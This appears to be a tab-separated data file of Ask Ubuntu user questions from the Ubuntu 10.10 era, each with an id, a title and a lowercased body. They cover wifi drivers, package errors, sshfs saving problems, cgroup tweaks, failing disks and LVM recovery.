13790	does 'ubuntu one mobile ' support ogg vorbis ?	the standard audio-format for music in rhythmbox is ogg . for some reason none of my music encoded as oggvorbis shows up in the ubuntu one mobile music application on my android phone . the mp3s do show up . it looks like the ubuntu one servers are not indexing ogg-files , although it is the open format for music with superior quality to mp3 and ubuntu 's rhythmbox encoded my cds to that format . solution ?
13791	modprobe ath9k at startup ?	i have finally managed to find a solution to make my wifi stable in ubuntu 10.10 . i have had problems with my asus ul30vt and the atheros ar9285 but by installing the latest compat-wireless from yesterday my internet is finally stable . i seriously thought of installing win7 again . but one minor problem i have is that the wifi is not turned on automatically from startup so everytime i startup i have to go to terminal and sudo modprobe ath9k and then the wireless turns on . i have tried to make that command in startup applications but that does not work . can i make a script or something that will turn it on from startup , or is there an other simple solution ?
13792	finding out what package a command came from	is there a generalised way to find out what package caused the installation of a command ?
13796	migration of mail from ubuntu server to google apps	as i 'm no longer able to keep my pet server around , i 've migrated my e-mail chores to a google apps domain . but i 'd rather keep my old e-mail archive around . i 've tried hacking it by connecting evolution to both accounts and drag-dropping between the two , but the timestamps get all weird and sent mail does n't show up correctly . while there is a mail migration api , that does n't work with the standard edition accounts , so no luck there . any alternative ways of moving my e-mail ? preferably something that works from the server , but i 'm willing to take detours , as it is a one-time job .
13807	does btrfs support thin provisioning and quota management like zfs ?	i checked the btrfs command and did n't find anything related to thiese features .
13809	ca n't install anything , dpkg error	i ca n't install anything on my ubuntu.. i googled it , found the same problem , but none of the proposed solutions solved my issue.. all the time , it keeps giving me no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : tex-common texlive-binaries e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i try to use sudo apt-get install xx thanks a lot !
13811	trying to install server but get this error : vfs : unable to mount root fs on unknown-block ( 1,0 )	we 're trying to install a server , ibm , but we get a kernel panic which says this : vfs : unable to mount root fs on unknown-block ( 1,0 ) panic+0x90/0x111 mount_block_root+0x273/0x29e mount_root+0x56/0x5a prepare_namespace+0x170/0x1a9 kernel_init+0x1ad/0x1bd kernel_thread_helper+0x4/0x10 ? kernel_init+0x0/0x1bd ? kernel_thread_helper+0x0/0x10 how could we solve this problem ? i get the error after i press install ubuntu server in the grub menu .
13816	need alternative to accessibility 's `` locate pointer '' to visually highlight the mouse	update : see end of question : a black-on-white cross-hair/i-bar mouse-pointer is soemtimes hard foe me to spot in amongst black-on-white text . i 've tried `` accessibility / mouse accessibility / locate pointer '' .. which will : show pointer position when control is presssed it works ( to a point ) , but it does have a notable problem , which renders it inpractical . it has the uncanny side-effect of disallowing all control key navigation while editing a file/dir name in nautilus ( f2 ) .. just touching the control key drops it out of edit mode , which means i ca n't keyboard paste , move-l/r word etc ... so , i 'm looking for an alternative . i 've tried compiz 's water effect , but i need something which is sharper , faster , and localized to the pointer . compiz 's show mouse ( with fire ) is not suitable . i 'm really lookingf for an analog of `` accessibility / locate pointer '' : * ie . i hit control ( only ) .. and it blips a quick visual pulse . update : i 've just realized why i ca n't find my mouse so often ! ... it 's because it is is n't there ! ! ! ... two apps i use a lot , gedit and konsole ( kde terminal ; it renders unicode better ) , ... dissolve the mouse-pointer to invisible after the first key is typed ... and konsole does it after a few seconds of idle-time ... like a video-player option : `` hide the mouse '' .. well i do n't use the mouse much , and i thought it was juse my eyesight ( which does rely a lot on compiz 's zoom ) ... i discovered it when i installed a `` novelty '' app , called geyes from gnome-applets ( `` a goofy set of eyes for the gnome panel . they follow your mouse . '' ) ... it could follow the mouse better than me ! : ) ...
13822	trash bin is not opening	my trash bin is not opening . it just shows the `` loading '' mouse cursor forever . any idea what can be wrong ? -- update ( after the answer ) after emptying the trash solved also a problem that used to occur when i remove the pendrive , saying that `` computer : /// could not be localized '' or something like this..
13824	laptop can not boot without external drive after installing grub there	i installed ubuntu 10.10 on an external drive , grub too . now i can not boot my laptop without that external device . could there be a way to choose between windows 7 bootloader and grub at the same time ? i want to be able to boot my laptop without the external driver . could it be done without reinstalling ubuntu ?
13827	bandwidth aggregation with multiple 3g cards ?	i have multiple 3g data cards as well as a wired connection to the internet . i can connect each of them separately and access the internet . is there any way i can aggregate the bandwidth of these cards to enjoy the combined speed ? what i mean is simultaneously plugging in all the cards and getting the sum total of the bandwidth .
13833	quanta touchscreen not recognized ?	i upgraded from 10.04 to 10.10 because i could not get my touchscreen to calibrate correctly , although i tried using the xinput_calibrator tool . in 10.04 i was able to get the touchscreen to react to a touch ( although badly calibrated ) by installing multitouch-kernel-source ( bytetips.com/touchscreen-support-ubuntu ) but there was no calibrator tool installed by default . i upgraded to 10.10 and now there is a built-in calibrator ( which i used several times with no effect ) , but the touchscreen is not working ( ie , cursor shows no reaction to touching screen ) . there is a terminal window that never closes ( without me manually closing it ) which says : warning : multiple calibratable devices found , calibrating last one ( quanta computer inc. optical touch screen ) use -- device to select another one . calibrating standard xorg driver `` quanta computer inc. optical touch screen '' current calibration values : min_x=0 , max_x=1023 and min_y=0 , max_y=767 if these values are estimated wrong , either supply it manually with the -- precalib option , or run the 'get_precalib.sh ' script to automatically get it ( through hal ) .
13835	ubuntuone contact syncing for thunderbird with new phone plans ?	syncing thunderbird contacts with ubuntuone previously relied on the funambol sync client , which used ubuntuone 's beta phone sync feature to basically treat thunderbird as a phone . with the introduction of paid syncing for phones , it does n't seem like there is anyway to sync thunderbird contacts with ubuntuone without paying for a phone plan . since that seems a little steep to just get that single piece of functionality , i was wondering if there are any other ways to sync thunderbird contacts with ubuntuone - either through couchdb or perhaps mirroring thunderbird contacts to evolution ? ( there is a question on this general topic already : ubuntuone contact synching for thunderbird ? , however , this is from before the plan and pricing restructuring was done and the answer provided is to use funambol in ubuntuone , so i thought it better to open a new question )
13837	where does ubuntu store the ssl certificates for pidgin ?	since today pidgin stopped working and the workaround is to `` refresh the ssl certificate '' . where is it stored ?
13839	what do instructions on ubuntuone wiki for getting bindwood ( firefox bookmark sync ) to work do exactly ?	i have the bindwood extension for firefox bookmark syncing through ubuntuone installed on two of my computers and none of the bookmarks have synced between them . the ubuntuone wiki has instructions for what to do in this situation : https : //wiki.ubuntu.com/ubuntuone/faq/whyarentbookmarkssyncing i 'm worried that those instructions might break my existing ubuntuone configuration . ( it was hard enough to get regular file syncing working properly , so i 'd rather not risk breaking anything . ) but deleting the password entries for couchdb and removing ~/.config/desktop-couch/desktop-couchdb.ini has me worried .
13840	appmenu indicator places drop down duplicates nautilus bookmarks	on the 'places ' drop down menu of the appmenu indicator applet , the list of nautilus bookmarks seems to be duplicated , it keeps repeating all of the bookmarks , so that places menu is very big . its only a minor annoyance but is there a way to prevent this ?
13843	gedit + sshfs wo n't save ( vi saves fine ! )	i mounted a remote directory using sshfs and i ca n't save files using gedit , while saving same file using vi works . changin permission to o-r ( 640 ) allows gedit to save files ok. is there a way to change sshfs connection to make gedit work without chmodding every file ? ( i use -o uid=id -u -o gid=id -g , so that remote files seem to be owned by me ) $ touch test.txt [ ! ] test.txt appears $ vi test.txt [ ! ] : wq - > saves just fine $ gedit test.txt [ ! ] opens fine , but upon save shows `` you do not have the [ ! ] permissions necessary to save the file '' error - [ ! ] ca n't save $ vi test.txt [ ! ] edit , : wq - > again saves just fine ! $ ls -l test.txt -rw-r -- r -- ... .. test.txt [ ! ] now the tricky part : $ chmod o-r test.txt -rw-r -- -- - ... .. test.txt < -- removed 'read ' perm . from 'others' $ gedit test.txt # works ! saves just fine ! why removing read permission from others allows gedit to save ? ( while vi and the rest does n't have that problem ? ) is there a way to change sshfs connection string to allow me to edit all files directly on server , without having to chmod o-r them ?
13850	how to get a new kernel patch the easy way ?	i think most of us heard of the speed boost kernel patch here . my question is how to get that patch on ubuntu 10.10 ? do i have to compile a kernel ( which i have never done before and the official ubuntu documentation is advising against it ) ? or should i just wait for few days or weeks and it will be available in automatic updates ? or it 's just something that will be available in the future of linux distros ?
13851	ibus color-icons	i 'm using ibus to enjoy some layouts and still it works great . however sometimes i notice that the icon of some of my typing input methods can not be displayed . reboot fix the issue but it 's like a wildcard , happens once in a while . is there a way to permanently fix it ? ( i 'm using ubuntu 10.10 )
13855	x server for windows ?	i 'm going to accessing my ubuntu machine remotely from my windows machine through putty . are there any suggestions for possible ways to get an x server running on my windows machine ? thanks .
13863	how to find and delete duplicated sources list entries ?	is there a command line to find and delete duplicated entries in the /etc/apt/sources.list file ? or is this possible via synaptic perhaps ?
13869	use existing ubuntu partition as an installation image ?	i installed ubuntu 10.10 on my laptop and configured a lot , installed and setup lot of things on it to suit my needs . now i want to move this setup to anothe machine and want to avoid all the setup again . is there a way i can create an installer out of my existing ubuntu installation/partition which i can reuse for other machines ?
13870	ca n't launch covergloobus : importerror	i installed covergloobus on my ubuntu 10.10 . but every time i try to run it , i get this error : [ warning ] using default configuration traceback ( most recent call last ) : file `` covergloobus-config.py '' , line 32 , in < module > configuration.run ( ) file `` /usr/share/covergloobus/widgets/configuration.py '' , line 94 , in run configuration.__instance = configuration ( cg ) file `` /usr/share/covergloobus/widgets/configuration.py '' , line 155 , in __init__ self.make_pages ( ) file `` /usr/share/covergloobus/widgets/configuration.py '' , line 165 , in make_pages page = method ( ) file `` /usr/share/covergloobus/widgets/configuration.py '' , line 432 , in make_lyrics for klass in genericlyric.load ( ) : file `` /usr/share/covergloobus/lyrics/__init__.py '' , line 34 , in load __import__ ( 'lyrics . ' + name [ : -3 ] ) file `` /usr/share/covergloobus/lyrics/lyricswikia.py '' , line 26 , in < module > from lyrics import genericlyric importerror : can not import name genericlyric does anybody know how to fix this ?
13871	asset management application ( or distro )	i am trying to find a good asset management solution ( gpl ) for our hospital ( we should take care of furniture , medical machines and personal computers ) , of course working on ubuntu and web-based . any hints ?
13872	acer aspire 4740 driver	how to istall intel graphic card driver in acer aspire 4740
13873	backup sources and setting for reinstall	i currently have ubuntu 10.10 installed on my laptop . configured just the way i like it . now i need to reinstall everything because i have a need to encrypt my whole hard drive and on ubuntu , that can only be done using the alternate cd . question is what would be a good way to reinstall everything including sources and ppa 's after encryption ?
13875	how do i install ubuntu on an imac 27 '' ?	i have a beautiful 27 '' imac . i would like to run ubuntu on it natively , dual-booting with os x. i have refit installed , and i can boot into the ubuntu 10.10 cd , kind of . here 's what happens : i select the cd from the refit menu it loads for a while , then flashes up an aubergine screen with a very low-res picture of a human , an arrow and a keyboard it sits there for a while it changes to 80x25 console mode the screen then goes black , as if nothing is displaying to it all the while , the cd is churning away as if something is reading from it . what do i do ?
13877	everytime i try to do updates via the update manager it prompts me to enter my password	so i do , and then it just hangs there , from there i can close the box using the `` x '' in the corner , then the update will continue , i am guessing this is not the intended behavior , any ideas as to what is going on ? i can update fine using the terminal ... just not using the update manager .
13878	optimizing gnome desktop for netbook	i tried the unity interface on my netbook and i felt it is not as good as gnome for a small screen . i want to know how ubuntu users can customize various gnome desktop features to suite or to make best use of a netbook screen . for example i have deleted the bottom panel , and brought the top panel below , and have made it auto-hide . also i have made the text size smaller everywhere . i have also customised firefox like so : i have got rid of status bar , menu bar so on . i feel that the title bar on many applications is not so much useful . so can it be removed , as it is done in google chrome . in opera and chrome the tab bar is very thick , so i am looking for a way to reduce the size . please post solutions to make optimal use of the netbook screen .
13879	how to backup a system with whole disk-encryption ?	what 's the way to backup a system encrypted with whole disk-encryption ? i mean , the total system is encrypted , not only the home folder .
13880	application to manage software updates on multiple desktops ?	i have a small home network of 5 ubuntu maverick desktops and 1 laptop . is there any application that would allow me to manage all software updates from a single location ? i guess much like landscape , but for a home network .
13886	how to light up back-lit keyboard ?	i recently got a backlit keyboard , and i love to write late at night . but i can not for the life of me figure out how to light it up ... it lights up when first plugged in , but nothing happens after that ... . it is an 'xtremeit ' keyboard . there is a video of someone on ubuntu who managed to activate it ... http : //www.youtube.com/watch ? v=dfecpdrbn8q
13887	how to recover unbootable system ?	i have just run the most recent set of recommended updates on a 10.10 system . the computer is now un-bootable . it gets as far as the `` ubuntu ... '' splash and then does nothing . i can not switch to a console . booting from the 10.10 live-cd is fine . seems like no point in doing a reinstall , as i 'll probably end up at the same point . downgrade the kernel or other software from the live-cd ? ? any recommendations ? this is a work computer , so i need to fix this asap . is ubuntu 10.10 not recommended for corporate environment . should i be using another distro ? thanks .
13892	is it possible to color the prompt in bash ?	is it possible to color the prompt ( `` user @ host : ~/dir/ $ '' ) in bash ? some commands generate a lot of output and it 's sometimes hard to find where it started . coloring would help a lot .
13897	what are the features of crossover office ?	i just read about crossover office , and am curious as to whether it makes sense to pay for it . apparently it 's run on wine , so aside from the support options , what features does it have that i ca n't already get by running a program with wine ? ( or in other words : is it worth paying for ? )
13905	apache solr and eclipse taking up huge amounts of memory	i have this pc with kubuntu and it gets really slow when i run programs like eclipse or talend . i know those two are memory hogs but i have 6gb ddr3 ( it does not say in the list but it 's ddr3 ) and sometimes it 's not all occupied and i the computer really slows down . also i think there is a problem with apache solr and kubuntu . when i run apache solr , apache uses 5gb of ram . in ubuntu server ( with less memory and less cpu power ) the same solr queries only make apache take up a few hundred mbs . here is the hardware list given by lshw , please tell me if any component is incompatibel with ubuntu : http : //pastebin.ca/1995800 ( could n't post it here because it was huge ) thanks edit : java version `` 1.6.0_20 '' openjdk runtime environment ( icedtea6 1.9.1 ) ( 6b20-1.9.1-1ubuntu3 ) openjdk 64-bit server vm ( build 17.0-b16 , mixed mode ) i am using this java version and it 's the same as in my ubuntu server machine which runs apache and solr without a problem .
13906	why does n't kde see the bold version of droid sans monospace , but gnome does ?	i 'm trying to set all my terminals to use the droid sans monospace font from the package ttf-droid . in gnome , this works perfectly , but kde 's konsole does not seem to see the bold version of the font . when i look in the font settings , the bold and bold oblique versions of the font do not show up in the list . why ca n't kde find the bold version of droid sans mono ? i 'm asking on this website because the answer may lie in the way the droid fonts or kde were packaged for ubuntu , so the answer may be ubuntu-specific .
13911	upgrading 10.04lts - > 10.10 using custom sources	i 'm trying to upgrade to 10.10 from 10.04 lts using a custom sources.list file that points to an unofficial mirror* . the mirror does have maverick , but i get the following output when upgrading : boatzart @ somecomputer : > sudo do-release-upgrade checking for a new ubuntu release done upgrade tool signature done upgrade tool done downloading extracting 'maverick.tar.gz' authenticate 'maverick.tar.gz ' against 'maverick.tar.gz.gpg ' tar : removing leading `/ ' from member names reading cache checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done reading package lists ... done building dependency tree reading state information ... done building data structures ... done updating repository information warning : failed to read mirror file no valid mirror found while scanning your repository information no mirror entry for the upgrade was found . this can happen if you run a internal mirror or if the mirror information is out of date . do you want to rewrite your 'sources.list ' file anyway ? if you choose 'yes ' here it will update all 'lucid ' to 'maverick ' entries . if you select 'no ' the upgrade will cancel . continue [ yn ] y warning : failed to read mirror file 96 % [ working ] checking package manager reading package lists ... done building dependency tree reading state information ... done building data structures ... done calculating the changes calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : the package 'update-manager-kde ' is marked for removal but it is in the removal blacklist . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug against the 'update-manager ' package and include the files in /var/log/dist-upgrade/ in the bug report . restoring original system state aborting reading package lists ... done building dependency tree reading state information ... done building data structures ... done here is the relevant section from /var/log/dist-upgrade/main.log : 2010-11-18 14:05:52,117 debug the package 'update-manager-kde ' is marked for removal but it 's in the removal blacklist 2010-11-18 14:05:52,136 error dist-upgrade failed : 'the package 'update-manager-kde ' is marked for removal but it is in the removal blacklist . ' 2010-11-18 14:05:52,136 debug abort called *i 'm located inside of usc , and for some crazy reason any sustained downloads to anywhere outside of the university are throttled down to 5kbps inside of my lab . because of this i need to use the following sources.list : deb http : //mirrors.usc.edu/pub/linux/distributions/ubuntu/ lucid main restricted universe multiverse deb http : //mirrors.usc.edu/pub/linux/distributions/ubuntu/ lucid-updates main restricted universe multiverse deb http : //mirrors.usc.edu/pub/linux/distributions/ubuntu/ lucid-backports main restricted universe multiverse deb http : //mirrors.usc.edu/pub/linux/distributions/ubuntu/ lucid-security main restricted universe multiverse i 've tried adding four more entries to the sources.list with s/lucid/maverick/ but that did n't help . does anyone know how to fix this ? thanks !
13915	how can i add `` show desktop '' docklet to docky ?	i have some missing docklets in docky i used to use before . the most important one i remember is `` show desktop '' which is important for me . i tried removing and installing it several times but no use i ca n't find it in the docklet 's part of the settings . i tried searching for something like docky-extras in aptitude and synaptic package manager and tried different terms and combination but seems like there is no such thing . so how can i add the missing docklet ?
13923	how to set up a .mac/mobileme account in evolution ?	what settings are necessary for setting up a .mac account ? at the very least for mail but would like calendars as well if its even a possibility .
13928	getting the alternative to the 200-line linux kernel patch to work	apparently , there is a comparable alternative to the 200-line kernel patch that involves no kernel upgrade . it is presented here and discussed here . however , i am not sure if webupd8 's solution ( under the section `` use it in ubuntu '' ) on ubuntu actually works or not . in particular , one commenter on ./ is saying he 's getting an error message . could anyone post the `` correct '' method that actually works ? suggested solution : based on the comments i 've read so far , the following seems to work . ( 1 ) in /etc/rc.local , add the following lines to above exit 0 : mkdir -p /dev/cgroup/cpu mount -t cgroup cgroup /dev/cgroup/cpu -o cpu mkdir -m 0777 /dev/cgroup/cpu/user echo `` /usr/local/sbin/cgroup_clean '' > /dev/cgroup/cpu/release_agent ( 2 ) create a file named /usr/local/sbin/cgroup_clean with the following content : # ! /bin/sh rmdir /dev/cgroup/cpu/ $ 1 ( 3 ) in your ~/.bashrc , add : if [ `` $ ps1 '' ] ; then mkdir -m 0700 /dev/cgroup/cpu/user/ $ $ echo $ $ > /dev/cgroup/cpu/user/ $ $ /tasks echo `` 1 '' > /dev/cgroup/cpu/user/ $ $ /notify_on_release fi ( 4 ) ( to make sure the execution bit is on ) execute sudo chmod +x /usr/local/sbin/cgroup_clean /etc/rc.local ( 5 ) reboot .
13931	remote desktop through xtightvncviewer share clipboard	i am using xtightvncviewer on a ubuntu machine to connect to the remote desktop of another ubuntu machine . how can i configure this to share the clipboard , so that i can copy and paste from one another ? thanks .
13936	how do i get pidgin connected to icq again ?	a few days ago pidgin gave me this error message from icq : received unexpected response from https : //api.oscar.aol.com/aim/startoscarsession : ok now it wo n't connect . i searched in google and several sites said this was a temporary problem that 's happened before . however , it 's been many days now and icq still does n't work .
13939	how to make keyring auto connect ?	everytime i login ubuntu , this keyring always pop out . how to make it auto connect ?
13940	using the `` alternative to the magic patch '' on a server : good idea or bad idea ?	i have read this question : getting the alternative to the 200-line linux kernel patch to work and i am trying it on my desktop ( s ) . is this a good idea for a server ? would it help in any way ? edit : i manage several servers : web servers , running apache/cherokee + php-fcgi + mysql django servers , running cherokee + python + mysql squid proxy , running squid 2.7 zabbix server , running zabbix 1.8 full stack opensuse 11.2 , running ifolder 3.8 server ( though obviously this one is n't the one i expect to get answers for in here ... : ) )
13944	how to view windows pc connected to lan ?	in my lan , there are 4 pcs . my pc is ubuntu , others are windows xp sp2 . to share files between us , i installed samba . in the network places , i can see others pc as well as mine . but when i click on it , it shows a popup `` unable to retrieve the share list from server '' . i dont know how to access them . i could n't see even my pc in the network folders . it say the same above message . previously i successfully shared files with the same ubuntu , same samba , same config . please tell me to trace the solution . from where i have to check .
13951	get compiz working on x1300 ati	i have ubuntu 10.10 installed on a thinkpad t60 with an ati mobile x1300 . ubuntu is n't loading any proprietary drivers and compiz does n't work . a google search turned up nothing . sure , some people reported `` bad performance '' , but i 'm not getting any `` performance '' with compiz and these post were all for previous editions . i 'm new to messing with ati drivers . is there a way to make sure xorg-video-ati is loaded ? do i have to add any voodoo lines somewhere in /etc/x11/ ? did anyone else have this problem ? thanks for your help !
13952	system locking up with suspicious messages about hard disk	my system has started behaving strangely , intermittently locking up . i see messages like the following in syslog : nov 18 22:22:00 claypool kernel : [ 3428.078156 ] ata3.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 nov 18 22:22:00 claypool kernel : [ 3428.078163 ] ata3.00 : irq_stat 0x40000000 nov 18 22:22:00 claypool kernel : [ 3428.078167 ] sr 2:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 nov 18 22:22:00 claypool kernel : [ 3428.078182 ] ata3.00 : cmd a0/00:00:00:00:00/00:00:00:00:00/a0 tag 0 nov 18 22:22:00 claypool kernel : [ 3428.078184 ] res 50/00:03:00:00:00/00:00:00:00:00/a0 emask 0x1 ( device error ) nov 18 22:22:00 claypool kernel : [ 3428.078188 ] ata3.00 : status : { drdy } nov 18 22:22:00 claypool kernel : [ 3428.080887 ] ata3.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 nov 18 22:22:00 claypool kernel : [ 3428.080890 ] ata3.00 : irq_stat 0x40000000 nov 18 22:22:00 claypool kernel : [ 3428.080893 ] sr 2:0:0:0 : cdb : test unit ready : 00 00 00 00 00 00 nov 18 22:22:00 claypool kernel : [ 3428.080905 ] ata3.00 : cmd a0/00:00:00:00:00/00:00:00:00:00/a0 tag 0 nov 18 22:22:00 claypool kernel : [ 3428.080906 ] res 50/00:03:00:00:00/00:00:00:00:00/a0 emask 0x1 ( device error ) nov 18 22:22:00 claypool kernel : [ 3428.080910 ] ata3.00 : status : { drdy } and then this : nov 18 23:13:56 claypool kernel : [ 6544.000798 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 frozen nov 18 23:13:56 claypool kernel : [ 6544.000804 ] ata1.00 : failed command : flush cache ext nov 18 23:13:56 claypool kernel : [ 6544.000814 ] ata1.00 : cmd ea/00:00:00:00:00/00:00:00:00:00/a0 tag 0 nov 18 23:13:56 claypool kernel : [ 6544.000815 ] res 40/00:00:00:4f : c2/00:00:00:00:00/40 emask 0x4 ( timeout ) nov 18 23:13:56 claypool kernel : [ 6544.000819 ] ata1.00 : status : { drdy } nov 18 23:13:56 claypool kernel : [ 6544.000825 ] ata1 : hard resetting link nov 18 23:14:01 claypool kernel : [ 6549.360324 ] ata1 : link is slow to respond , please be patient ( ready=0 ) nov 18 23:14:06 claypool kernel : [ 6554.008091 ] ata1 : comreset failed ( errno=-16 ) nov 18 23:14:06 claypool kernel : [ 6554.008103 ] ata1 : hard resetting link nov 18 23:14:11 claypool kernel : [ 6559.372246 ] ata1 : link is slow to respond , please be patient ( ready=0 ) nov 18 23:14:16 claypool kernel : [ 6564.020228 ] ata1 : comreset failed ( errno=-16 ) nov 18 23:14:16 claypool kernel : [ 6564.020235 ] ata1 : hard resetting link nov 18 23:14:21 claypool kernel : [ 6569.380109 ] ata1 : link is slow to respond , please be patient ( ready=0 ) nov 18 23:14:31 claypool kernel : [ 6579.460243 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) nov 18 23:14:31 claypool kernel : [ 6579.486595 ] ata1.00 : configured for udma/133 nov 18 23:14:31 claypool kernel : [ 6579.486601 ] ata1.00 : retrying flush 0xea emask 0x4 nov 18 23:14:31 claypool kernel : [ 6579.486939 ] ata1.00 : device reported invalid chs sector 0 nov 18 23:14:31 claypool kernel : [ 6579.486952 ] ata1 : eh complete nov 18 23:17:01 claypool cron [ 3910 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) nov 18 23:17:01 claypool cron [ 3908 ] : ( cron ) error ( grandchild # 3910 failed with exit status 1 ) nov 18 23:17:01 claypool postfix/sendmail [ 3925 ] : fatal : open /etc/postfix/main.cf : no such file or directory nov 18 23:17:01 claypool cron [ 3908 ] : ( root ) mail ( mailed 1 byte of output ; but got status 0x004b , # 012 ) nov 18 23:39:01 claypool cron [ 4200 ] : ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) -print0 | xargs -n 200 -r -0 rm ) there are no messages marked after 23:39 . when i next tried to use the machine , it would not return from the screensaver ( blank screen ) , nor switch to another terminal , and i had to hard reboot it . [ update ] the output of smartctl is here . i had trouble getting this , because / is being mounted read-only ( ? ! ) , which prevents most applications from running . also , it may not be related , but i have the following worrying messages in dmesg : [ 10.084596 ] k8temp 0000:00:18.3 : temperature readouts might be wrong - check erratum # 141 [ 10.098477 ] i2c i2c-0 : nforce2 smbus adapter at 0x600 [ 10.098483 ] acpi : resource nforce2_smbus [ io 0x0700-0x073f ] conflicts with acpi region sm00 [ ? ? ? 0x00000700-0x0000073f flags 0x30 ] [ 10.098486 ] acpi : this conflict may cause random problems and system instability [ 10.098487 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 10.098509 ] i2c i2c-1 : nforce2 smbus adapter at 0x700 [ 10.112570 ] linux agpgart interface v0.103 [ 10.155329 ] atk : resources not safely usable due to acpi_enforce_resources kernel parameter [ 10.161506 ] it87 : found it8712f chip at 0x290 , revision 8 [ 10.161517 ] it87 : vid is disabled ( pins used for gpio ) [ 10.161527 ] it87 : in3 is vcc ( +5v ) [ 10.161528 ] it87 : in7 is vcch ( +5v stand-by ) [ 10.161560 ] acpi : resource it87 [ io 0x0295-0x0296 ] conflicts with acpi region ecre [ ? ? ? 0x00000290-0x000002af flags 0x45 ] [ 10.161562 ] acpi : this conflict may cause random problems and system instability [ 10.161564 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ update 2 ] i swapped in a new sata cable , per phil 's suggestion . the current output of smartctl is here , if it helps . [ update 3 ] i do n't think the cable fixed it . the system has n't locked up yet , but my media player crashed a few minutes ago and i have the following in the syslog : nov 20 16:07:17 claypool kernel : [ 2294.400033 ] ata1 : link is slow to respond , please be patient ( ready=0 ) nov 20 16:07:47 claypool kernel : [ 2324.084581 ] ata1 : comreset failed ( errno=-16 ) nov 20 16:07:47 claypool kernel : [ 2324.084588 ] ata1 : limiting sata link speed to 1.5 gbps nov 20 16:07:47 claypool kernel : [ 2324.084592 ] ata1 : hard resetting link i get the following response from smartctl : $ sudo smartctl -a /dev/sda [ sudo ] password for chris : sudo : ca n't open /var/lib/sudo/chris/0 : read-only file system smartctl 5.40 2010-03-16 r3077 [ i686-pc-linux-gnu ] ( local build ) copyright ( c ) 2002-10 by bruce allen , http : //smartmontools.sourceforge.net device : /0:0:0:0 version : scsimodepageoffset : response length too short , resp_len=47 offset=50 bd_len=46 > > terminate command early due to bad response to iec mode page a mandatory smart command failed : exiting . to continue , add one or more '-t permissive ' options .
13953	how to make quanta plus editor as a default editor ?	when i click on any file eg php file it open by default in gedit i want that it will open by default in quanta plus
13954	why does the mouse cursor disappear while typing in tomboy ?	in my laptop ( under ubuntu 10.10 upgraded from 10.04 ) the mouse cursor will disappear while and after i 'm typing something in tomboy . this will also happen in google-chrome location bar . i think it could be some old config file errors . but i do not want to clean all my config files . so i 'm wondering does anyone know what config file should be cleaned ? thanks~
13956	ppa hosting packages not built on launchpad build farm	is it possible to build the deb packages in house and then upload the binaries to launchpad ppa , instead of uploading the source package and let it build by the build farm ?
13958	vlc is set to open the folders ( home , desktop , documents etc ) in the places menu . how to reset this ?	so i downloaded something with kget and somehow set all the folders in the places menu to open in vlc rather than in the default file manager . how do i clear this ?
13963	call script after connecting to a wireless network	is there a way for me to call a shell script once i connect to a specific wireless network ? reason i want to do this is i have to login to the network before i can start using it and i would like to automate this if possible . i read this question : is there a way to run a script every time i connect to a specifc wireless network ? but i 'm really unsure as to how to use upstart to do it .
13965	waiting for other software manager to quit	i 'm unable to install any of the programs from ubuntu software center . it constantly stays at 0 % with the following message : 'waiting for other software manager to quit . ' how could i solve this problem ?
13967	importing mail files of type message/rfc822	i 've successfully import mail files to kmail , but since there was only one message in each file , it was inconvenient to read it since each message was stored in a separate folder . ( i used the import evolution 2.x local mails and folder structure option to import those files ) how can i import the mail files without having kmail dedicating a separate folder for each message ? check here for an example of a mail file .
13969	how to play .ts files ? ( and other unusual formats )	how can i play .ts files in ubuntu ? i would prefer if you could recommend a codec instead of a new piece of software , so i can use any software to play . and is there any codec pack that make me sure i will be able to play all ordinary media files ? something similar to k-lite codec pack . note : some of my .ts files already can be played with smplay , but just some ... ps : as i mentioned above i already can play some .ts files . and i have ubuntu-restricted-extras and mplayer and samplayer in latest version . the problem is that some .ts files that open in windows systems do not play in my ubuntu 10.04
13974	quiz master software ?	are there any software for ubuntu which quiz masters can use to display questions for quiz events ? if there are n't any , what tools or frameworks provide an easir way to build one . minimum requirements are : a window with eye-candy look , one or multiple text questions on each page , display of multiple images or a single picture and also ability to include videos or sound . there should be an interface to display scores .
13975	remember last window location	how can i configure my ubuntu to start all program windows at the last window location ? in compiz i only can configure that all windows start in one corner , centered , etc . or i have to define rules for each program where it starts ... that is too laboroius .
13976	how to get opera work correctly with privoxy ?	i use privoxy and recently switched back to opera as browser . anything is fine , but one thing is annoying : everytime i start the computer i have to restart privoxy ( sudo /etc/init.d/privoxy restart ) or opera shows an error , that it can not reach the proxy . what is wrong here ?
13977	dual booting two ubuntu versions	i want to install two ubuntu versions on the same system ( like dual boot ) . i 'm using ubuntu 9.10 and i also want to install ubuntu 10 . please tell me how i might do this , as i do n't know enough about linux .
13981	recover lvm after hdd crash	yesterday , one hdd of my lvm crashed ( smart-error ) the machine has the following setup : - 4 hdds - 1 partition raid10 ( system , 4*50gb ) - 1 partition normal ( /boot , 200mb , sda ) - 1 partition lvm2 ( data , 4*~850gb ) - ubuntu 10.04 server ( headless ) now my lvm wo n't mount anymore , ubuntu asks me to skip or manually recover on bootup . when i press s the system starts , but without my lvm getting mounted . now my system partition does not seam to be affected ( /proc/mdstat looks as usual ) an /boot works fine , too . what i will try now is to - buy a new hdd - integrate the hdd in my lvm - try to remove the sda-part of the lvm ( copy it over to the new sde , or whatever lvm wants ) - do the raid stuff ( i think i 'll find out how to do that , otherwise i 'll ask a separate question ) now my problems : - how can i remove sda from the lvm ( remove meaning copy contents and mark partition as not in use so i can unplug the drive ) ? - if i am not able to remove the partition normally , are there any tools to recover the files on this partition , so i could manually copy them to the `` new '' lvm ? thank you for your help edit : separated solution from question
